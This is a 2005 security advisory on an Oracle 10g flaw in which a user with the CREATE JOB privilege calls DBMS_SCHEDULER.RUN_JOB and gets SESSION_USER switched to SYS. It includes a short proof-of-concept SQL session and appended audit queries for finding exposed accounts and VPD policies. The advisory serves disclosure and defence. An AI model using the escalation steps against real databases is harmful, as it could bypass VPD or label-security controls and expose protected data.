Name: DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected: Oracle 10g
Severity: Medium Risk
Category: Switch Oracle Username to user SYS
Vendor URL: http://www.oracle.com/
Credit: Oracle Metalink Forum 633336.995
Exploit: http://metalink.oracle.com/metalink/plsql/ml2_documents.showDocument?p_database_id=FOR&p_id=633336.995
Date: 02 May 2005 (V 1.00)
Details
The following proof of concept exploit code (from Metalink) allows any user with the CREATE JOB privilege to switch the session_user to SYS. The session_user value is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security), so the wrong value could allow privilege escalation. The old, deprecated current_user shows the right user.
Example
Connect as a user with the CREATE JOB privilege:
SQL> select user from dual;
JOBUSER
SQL> execute dbms_scheduler.run_job('ANY_JOB');
PL/SQL procedure successfully completed.
SQL> select user from dual;
SYS
SQL> select (sys_context('userenv','session_user')) from dual;
SYS
SQL> select (sys_context('userenv','current_user')) from dual;
JOBUSER
SQL> show user
USER is "jobuser"
Patch Information
Oracle never released a security alert. It seems that this bug is fixed after applying the 10.0.1.4 patchset for Oracle.
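The following audit queries are an added example, not part of the original advisory or the Metalink post. They list who holds the CREATE JOB precondition and which VPD policy code reads SESSION_USER, and they assume the auditor can read the DBA_* dictionary views and V$VERSION.

```sql
-- 1. Database version, to compare against the patchset named in this advisory.
SELECT banner FROM v$version;

-- 2. Accounts and roles that hold CREATE JOB directly.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'CREATE JOB'
ORDER  BY grantee;

-- 3. Database users that inherit CREATE JOB through a role,
--    walking nested role grants from each grantee downwards.
SELECT DISTINCT r.username, p.grantee AS via_role
FROM  (SELECT CONNECT_BY_ROOT grantee AS username, granted_role
       FROM   dba_role_privs
       CONNECT BY NOCYCLE PRIOR granted_role = grantee) r
JOIN   dba_sys_privs p ON p.grantee  = r.granted_role
JOIN   dba_users     u ON u.username = r.username
WHERE  p.privilege = 'CREATE JOB'
ORDER  BY r.username, via_role;

-- 4. VPD policies registered in the database and the code unit behind each one.
SELECT object_owner, object_name, policy_name,
       pf_owner, package, function
FROM   dba_policies
ORDER  BY object_owner, object_name;

-- 5. Lines in those policy functions or packages that read SESSION_USER.
--    A policy keyed on this value trusts exactly the attribute the
--    advisory shows being switched to SYS. Policy code that uses the
--    USER function instead needs the same review (the session above
--    shows USER returning SYS as well), but is not matched here.
SELECT s.owner, s.name, s.type, s.line, s.text
FROM   dba_source s
WHERE  UPPER(s.text) LIKE '%SESSION_USER%'
AND    (s.owner, s.name) IN
       (SELECT pf_owner, NVL(package, function) FROM dba_policies)
ORDER  BY s.owner, s.name, s.type, s.line;
```

Any account returned by queries 2 or 3 that does not need to create scheduler jobs is a candidate for having the privilege revoked until the patchset is applied.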
© 2005 by Red-Database-Security GmbH - last update 2-may-2005